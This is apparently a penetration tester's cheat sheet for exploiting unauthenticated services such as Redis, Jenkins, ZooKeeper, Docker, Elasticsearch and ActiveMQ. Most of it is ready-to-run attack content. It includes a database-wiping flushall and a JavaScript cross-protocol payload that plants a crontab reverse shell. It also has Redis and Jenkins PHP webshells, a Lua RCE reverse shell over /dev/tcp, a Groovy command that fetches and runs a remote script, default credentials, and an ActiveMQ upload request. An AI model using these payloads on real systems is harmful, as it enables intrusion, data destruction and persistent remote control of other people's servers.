Redis

Check with redis-cli. A PONG to ping with no NOAUTH error means the instance accepts commands without a password (flushall empties every database on the target; the notes run it so the RDB dump written later contains only the payload):
>redis-cli -h 127.0.0.1 flushall
192.168.0.110:6379>ping
PONG    unauthenticated access confirmed

Attacking an internal Redis from JavaScript
// Cross-protocol request: the browser's HTTP request reaches Redis line by line. Redis ignores the
// lines it cannot parse and executes the ones it can. Synchronous requests keep the order
// flushall -> eval -> save. Redis 3.2 and later close the connection as soon as they see a
// "POST" or "Host:" line, so this only works against older versions.
function redisCmd(line) {
  var req = new XMLHttpRequest();
  req.open("POST", "http://127.0.0.1:6379", false);
  try { req.send(line + "\r\n"); } catch (e) {} // Redis never answers with valid HTTP; ignore the error
}
redisCmd("flushall");
// Store a crontab line in key "1", then point the RDB dump at root's crontab file
redisCmd("eval '" +
  "redis.call(\"set\",\"1\",\"\\n\\n*/1 * * * * /bin/bash -i >&/dev/tcp/EXTERNAL_IP/5566 0>&1\\n\\n\");" +
  "redis.call(\"config\",\"set\",\"dir\",\"/var/spool/cron/\");" +
  "redis.call(\"config\",\"set\",\"dbfilename\",\"root\")' 0");
redisCmd("save");

Reverse shell: the eval payload above writes a crontab entry to /var/spool/cron/root that connects back to EXTERNAL_IP:5566 every minute.

Writing a webshell
Point the RDB dump at the web root, store the PHP in a key, and save. The dump is a binary RDB file, but PHP ignores the bytes outside the <?php ... ?> tags; the web root must be writable by the user Redis runs as.
6379> config set dir /var/www/html/
6379> config set dbfilename shell.php
6379> set x "<?php phpinfo();?>"
6379> save

Lua RCE
https://github.com/QAX-A-Team/redis_lua_exploit
Set host in redis_lua.py to the target IP and run it. If it returns normally, get a reverse shell with:
>eval "tonumber('/bin/bash -i >& /dev/tcp/192.168.0.108/12345 0>&1', 8)" 0

Jenkins unauthorized access

http://www.qq.com:8080/manage
http://www.qq.com:8080/script
Run commands from the Groovy script console:
>println "ifconfig -a".execute().text
Reverse shell
>println "wget http://your.com/back.py -P /tmp/".execute().text
>println "python /tmp/back.py yourIP 8080".execute().text
Write a webshell (wget's -O names the output file; lowercase -o is the log file)
>println "wget http://your.com/t.txt -O /var/www/html/1.php".execute().text
>new File("/var/www/html/1.php").write('<?php @eval($_POST[1]);?>');
>def webshell = '<?php @eval($_POST[1]);?>'
>new File("/var/www/html/1.php").write("$webshell");

MongoDB unauthorized access

Default port 27017. Connect directly and read, insert, update and delete data.

ZooKeeper unauthorized access

Default port 2181
Get the server environment information:
>echo envi|nc 192.168.0.1 2181
Connect:
>./zkCli.sh -server ip:port

Elasticsearch unauthorized access

Default port 9200
http://1.1.1.1:9200/_plugin/head/
http://1.1.1.1:9200/_nodes
http://1.1.1.1:9200/_river
http://1.1.1.1:9200/_plugin/sql/

Memcache unauthorized access

Default port 11211
>telnet 1.1.1.1 11211
>nc -vv 1.1.1.1 11211

Hadoop unauthorized access

Default port 50070 (NameNode web UI)

Docker unauthorized access

Default port 2375
>docker -H tcp://1.1.1.1:2375 images

Shipyard
Default credentials
admin/shipyard

ActiveMQ unauthorized access

Default port 8161
http://1.1.1.1:8161/admin/connections.jsp
Upload a file through the fileserver web application with the default credentials (YWRtaW46YWRtaW4= decodes to admin:admin):
PUT /fileserver/%2F%2F2%083.jsp HTTP/1.0
Content-Length: 27
Host: 1.1.1.1:8161
Connection: Close
Authorization: Basic YWRtaW46YWRtaW4=

123123123123123123123123123